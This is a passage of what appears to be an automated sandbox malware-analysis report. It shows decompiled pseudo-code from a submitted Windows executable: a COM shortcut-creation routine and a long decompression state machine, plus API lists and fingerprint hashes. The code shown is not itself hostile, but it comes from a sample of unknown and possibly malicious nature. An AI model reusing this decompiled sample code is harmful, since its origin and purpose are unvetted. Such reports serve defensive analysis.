                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                				_t52 =  *(_t107 - 0x20);
                                                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                					E00402DA6(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID:
                                                • API String ID: 542301482-0
                                                • Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                • Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00406D85(signed int __ebx, signed int* __esi) {
                                                				signed int _t396;
                                                				signed int _t425;
                                                				signed int _t442;
                                                				signed int _t443;
                                                				signed int* _t446;
                                                				void* _t448;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t446 = __esi;
                                                					_t425 = __ebx;
                                                					if( *(_t448 - 0x34) == 0) {
                                                						break;
                                                					}
                                                					L55:
                                                					__eax =  *(__ebp - 0x38);
                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                					__ecx = __ebx;
                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                					__ebx = __ebx + 8;
                                                					while(1) {
                                                						L56:
                                                						if(__ebx < 0xe) {
                                                							goto L0;
                                                						}
                                                						L57:
                                                						__eax =  *(__ebp - 0x40);
                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                						__ecx = __eax;
                                                						__esi[1] = __eax;
                                                						__ecx = __eax & 0x0000001f;
                                                						if(__cl > 0x1d) {
                                                							L9:
                                                							_t443 = _t442 | 0xffffffff;
                                                							 *_t446 = 0x11;
                                                							L10:
                                                							_t446[0x147] =  *(_t448 - 0x40);
                                                							_t446[0x146] = _t425;
                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                							L11:
                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                							E004074F4( *(_t448 + 8));
                                                							return _t443;
                                                						}
                                                						L58:
                                                						__eax = __eax & 0x000003e0;
                                                						if(__eax > 0x3a0) {
                                                							goto L9;
                                                						}
                                                						L59:
                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                						__ebx = __ebx - 0xe;
                                                						_t94 =  &(__esi[2]);
                                                						 *_t94 = __esi[2] & 0x00000000;
                                                						 *__esi = 0xc;
                                                						while(1) {
                                                							L60:
                                                							__esi[1] = __esi[1] >> 0xa;
                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                								goto L68;
                                                							}
                                                							L61:
                                                							while(1) {
                                                								L64:
                                                								if(__ebx >= 3) {
                                                									break;
                                                								}
                                                								L62:
                                                								if( *(__ebp - 0x34) == 0) {
                                                									goto L182;
                                                								}
                                                								L63:
                                                								__eax =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                								__ecx = __ebx;
                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                								__ebx = __ebx + 8;
                                                							}
                                                							L65:
                                                							__ecx = __esi[2];
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ebx = __ebx - 3;
                                                							_t108 = __ecx + 0x4084d4; // 0x121110
                                                							__ecx =  *_t108;
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ecx = __esi[1];
                                                							__esi[2] = __esi[2] + 1;
                                                							__eax = __esi[2];
                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                								goto L64;
                                                							}
                                                							L66:
                                                							while(1) {
                                                								L68:
                                                								if(__esi[2] >= 0x13) {
                                                									break;
                                                								}
                                                								L67:
                                                								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                								__eax =  *_t119;
                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                								_t126 =  &(__esi[2]);
                                                								 *_t126 = __esi[2] + 1;
                                                							}
                                                							L69:
                                                							__ecx = __ebp - 8;
                                                							__edi =  &(__esi[0x143]);
                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                							__eax = 0;
                                                							 *(__ebp - 8) = 0;
                                                							__eax =  &(__esi[3]);
                                                							 *__edi = 7;
                                                							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                							if(__eax != 0) {
                                                								L72:
                                                								 *__esi = 0x11;
                                                								while(1) {
                                                									L180:
                                                									_t396 =  *_t446;
                                                									if(_t396 > 0xf) {
                                                										break;
                                                									}
                                                									L1:
                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                										case 0:
                                                											L101:
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[5];
                                                											__esi[2] = __esi[5];
                                                											 *__esi = 1;
                                                											goto L102;
                                                										case 1:
                                                											L102:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L105:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L103:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L104:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L106:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __ecx;
                                                											if(__ecx != 0) {
                                                												L108:
                                                												__eflags = __cl & 0x00000010;
                                                												if((__cl & 0x00000010) == 0) {
                                                													L110:
                                                													__eflags = __cl & 0x00000040;
                                                													if((__cl & 0x00000040) == 0) {
                                                														goto L125;
                                                													}
                                                													L111:
                                                													__eflags = __cl & 0x00000020;
                                                													if((__cl & 0x00000020) == 0) {
                                                														goto L9;
                                                													}
                                                													L112:
                                                													 *__esi = 7;
                                                													goto L180;
                                                												}
                                                												L109:
                                                												__esi[2] = __ecx;
                                                												__esi[1] = __eax;
                                                												 *__esi = 2;
                                                												goto L180;
                                                											}
                                                											L107:
                                                											__esi[2] = __eax;
                                                											 *__esi = 6;
                                                											goto L180;
                                                										case 2:
                                                											L113:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L116:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L114:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L115:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L117:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[6];
                                                											__esi[2] = __esi[6];
                                                											 *__esi = 3;
                                                											goto L118;
                                                										case 3:
                                                											L118:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L121:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L119:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L120:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L122:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __cl & 0x00000010;
                                                											if((__cl & 0x00000010) == 0) {
                                                												L124:
                                                												__eflags = __cl & 0x00000040;
                                                												if((__cl & 0x00000040) != 0) {
                                                													goto L9;
                                                												}
                                                												L125:
                                                												__esi[3] = __ecx;
                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                												__esi[2] = __eax;
                                                												goto L180;
                                                											}
                                                											L123:
                                                											__esi[2] = __ecx;
                                                											__esi[3] = __eax;
                                                											 *__esi = 4;
                                                											goto L180;
                                                										case 4:
                                                											L126:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L129:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L127:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L128:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L130:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											 *__esi = 5;
                                                											goto L131;
                                                										case 5:
                                                											L131:
                                                											__eax =  *(__ebp - 0x30);
                                                											__edx = __esi[3];
                                                											__eax = __eax - __esi;
                                                											__ecx = __eax - __esi - 0x1ba0;
                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                												__ecx = __eax;
                                                												__ecx = __eax - __edx;
                                                												__eflags = __ecx;
                                                											} else {
                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                											}
                                                											__eflags = __esi[1];
                                                											 *(__ebp - 0x20) = __ecx;
                                                											if(__esi[1] != 0) {
                                                												L135:
                                                												__edi =  *(__ebp - 0x2c);
                                                												do {
                                                													L136:
                                                													__eflags = __edi;
                                                													if(__edi != 0) {
                                                														goto L152;
                                                													}
                                                													L137:
                                                													__edi = __esi[0x26e8];
                                                													__eflags = __eax - __edi;
                                                													if(__eax != __edi) {
                                                														L143:
                                                														__esi[0x26ea] = __eax;
                                                														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                														__eax = __esi[0x26ea];
                                                														__ecx = __esi[0x26e9];
                                                														__eflags = __eax - __ecx;
                                                														 *(__ebp - 0x30) = __eax;
                                                														if(__eax >= __ecx) {
                                                															__edi = __esi[0x26e8];
                                                															__edi = __esi[0x26e8] - __eax;
                                                															__eflags = __edi;
                                                														} else {
                                                															__ecx = __ecx - __eax;
                                                															__edi = __ecx - __eax - 1;
                                                														}
                                                														__edx = __esi[0x26e8];
                                                														__eflags = __eax - __edx;
                                                														 *(__ebp - 8) = __edx;
                                                														if(__eax == __edx) {
                                                															__edx =  &(__esi[0x6e8]);
                                                															__eflags = __ecx - __edx;
                                                															if(__ecx != __edx) {
                                                																__eax = __edx;
                                                																__eflags = __eax - __ecx;
                                                																 *(__ebp - 0x30) = __eax;
                                                																if(__eax >= __ecx) {
                                                																	__edi =  *(__ebp - 8);
                                                																	__edi =  *(__ebp - 8) - __eax;
                                                																	__eflags = __edi;
                                                																} else {
                                                																	__ecx = __ecx - __eax;
                                                																	__edi = __ecx;
                                                																}
                                                															}
                                                														}
                                                														__eflags = __edi;
                                                														if(__edi == 0) {
                                                															goto L183;
                                                														} else {
                                                															goto L152;
                                                														}
                                                													}
                                                													L138:
                                                													__ecx = __esi[0x26e9];
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx == __edx) {
                                                														goto L143;
                                                													}
                                                													L139:
                                                													__eax = __edx;
                                                													__eflags = __eax - __ecx;
                                                													if(__eax >= __ecx) {
                                                														__edi = __edi - __eax;
                                                														__eflags = __edi;
                                                													} else {
                                                														__ecx = __ecx - __eax;
                                                														__edi = __ecx;
                                                													}
                                                													__eflags = __edi;
                                                													if(__edi == 0) {
                                                														goto L143;
                                                													}
                                                													L152:
                                                													__ecx =  *(__ebp - 0x20);
                                                													 *__eax =  *__ecx;
                                                													__eax = __eax + 1;
                                                													__ecx = __ecx + 1;
                                                													__edi = __edi - 1;
                                                													__eflags = __ecx - __esi[0x26e8];
                                                													 *(__ebp - 0x30) = __eax;
                                                													 *(__ebp - 0x20) = __ecx;
                                                													 *(__ebp - 0x2c) = __edi;
                                                													if(__ecx == __esi[0x26e8]) {
                                                														__ecx =  &(__esi[0x6e8]);
                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                													}
                                                													_t357 =  &(__esi[1]);
                                                													 *_t357 = __esi[1] - 1;
                                                													__eflags =  *_t357;
                                                												} while ( *_t357 != 0);
                                                											}
                                                											goto L23;
                                                										case 6:
                                                											L156:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__edi =  *(__ebp - 0x30);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L172:
                                                												__cl = __esi[2];
                                                												 *__edi = __cl;
                                                												__edi = __edi + 1;
                                                												__eax = __eax - 1;
                                                												 *(__ebp - 0x30) = __edi;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												goto L23;
                                                											}
                                                											L157:
                                                											__ecx = __esi[0x26e8];
                                                											__eflags = __edi - __ecx;
                                                											if(__edi != __ecx) {
                                                												L163:
                                                												__esi[0x26ea] = __edi;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edi = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edi - __ecx;
                                                												 *(__ebp - 0x30) = __edi;
                                                												if(__edi >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edi;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edi;
                                                													__eax = __ecx - __edi - 1;
                                                												}
                                                												__edx = __esi[0x26e8];
                                                												__eflags = __edi - __edx;
                                                												 *(__ebp - 8) = __edx;
                                                												if(__edi == __edx) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx != __edx) {
                                                														__edi = __edx;
                                                														__eflags = __edi - __ecx;
                                                														 *(__ebp - 0x30) = __edi;
                                                														if(__edi >= __ecx) {
                                                															__eax =  *(__ebp - 8);
                                                															__eax =  *(__ebp - 8) - __edi;
                                                															__eflags = __eax;
                                                														} else {
                                                															__ecx = __ecx - __edi;
                                                															__eax = __ecx;
                                                														}
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L172;
                                                												}
                                                											}
                                                											L158:
                                                											__eax = __esi[0x26e9];
                                                											__edx =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edx;
                                                											if(__eax == __edx) {
                                                												goto L163;
                                                											}
                                                											L159:
                                                											__edi = __edx;
                                                											__eflags = __edi - __eax;
                                                											if(__edi >= __eax) {
                                                												__ecx = __ecx - __edi;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edi;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L172;
                                                											} else {
                                                												goto L163;
                                                											}
                                                										case 7:
                                                											L173:
                                                											__eflags = __ebx - 7;
                                                											if(__ebx > 7) {
                                                												__ebx = __ebx - 8;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                												_t380 = __ebp - 0x38;
                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                												__eflags =  *_t380;
                                                											}
                                                											goto L175;
                                                										case 8:
                                                											L4:
                                                											while(_t425 < 3) {
                                                												if( *(_t448 - 0x34) == 0) {
                                                													goto L182;
                                                												} else {
                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                													_t425 = _t425 + 8;
                                                													continue;
                                                												}
                                                											}
                                                											_t425 = _t425 - 3;
                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                											asm("sbb ecx, ecx");
                                                											_t408 = _t406 >> 1;
                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                											if(_t408 == 0) {
                                                												L24:
                                                												 *_t446 = 9;
                                                												_t436 = _t425 & 0x00000007;
                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                												_t425 = _t425 - _t436;
                                                												goto L180;
                                                											}
                                                											L6:
                                                											_t411 = _t408 - 1;
                                                											if(_t411 == 0) {
                                                												L13:
                                                												__eflags =  *0x432e90;
                                                												if( *0x432e90 != 0) {
                                                													L22:
                                                													_t412 =  *0x40a5e8; // 0x9
                                                													_t446[4] = _t412;
                                                													_t413 =  *0x40a5ec; // 0x5
                                                													_t446[4] = _t413;
                                                													_t414 =  *0x431d0c; // 0x432610
                                                													_t446[5] = _t414;
                                                													_t415 =  *0x431d08; // 0x432e10
                                                													_t446[6] = _t415;
                                                													L23:
                                                													 *_t446 =  *_t446 & 0x00000000;
                                                													goto L180;
                                                												} else {
                                                													_t26 = _t448 - 8;
                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                													__eflags =  *_t26;
                                                													_t416 = 0x431d10;
                                                													goto L15;
                                                													L20:
                                                													 *_t416 = _t438;
                                                													_t416 = _t416 + 4;
                                                													__eflags = _t416 - 0x432190;
                                                													if(_t416 < 0x432190) {
                                                														L15:
                                                														__eflags = _t416 - 0x431f4c;
                                                														_t438 = 8;
                                                														if(_t416 > 0x431f4c) {
                                                															__eflags = _t416 - 0x432110;
                                                															if(_t416 >= 0x432110) {
                                                																__eflags = _t416 - 0x432170;
                                                																if(_t416 < 0x432170) {
                                                																	_t438 = 7;
                                                																}
                                                															} else {
                                                																_t438 = 9;
                                                															}
                                                														}
                                                														goto L20;
                                                													} else {
                                                														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                														_push(0x1e);
                                                														_pop(_t440);
                                                														_push(5);
                                                														_pop(_t419);
                                                														memset(0x431d10, _t419, _t440 << 2);
                                                														_t450 = _t450 + 0xc;
                                                														_t442 = 0x431d10 + _t440;
                                                														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                														 *0x432e90 =  *0x432e90 + 1;
                                                														__eflags =  *0x432e90;
                                                														goto L22;
                                                													}
                                                												}
                                                											}
                                                											L7:
                                                											_t423 = _t411 - 1;
                                                											if(_t423 == 0) {
                                                												 *_t446 = 0xb;
                                                												goto L180;
                                                											}
                                                											L8:
                                                											if(_t423 != 1) {
                                                												goto L180;
                                                											}
                                                											goto L9;
                                                										case 9:
                                                											while(1) {
                                                												L27:
                                                												__eflags = __ebx - 0x20;
                                                												if(__ebx >= 0x20) {
                                                													break;
                                                												}
                                                												L25:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L26:
                                                												__eax =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__ecx = __ebx;
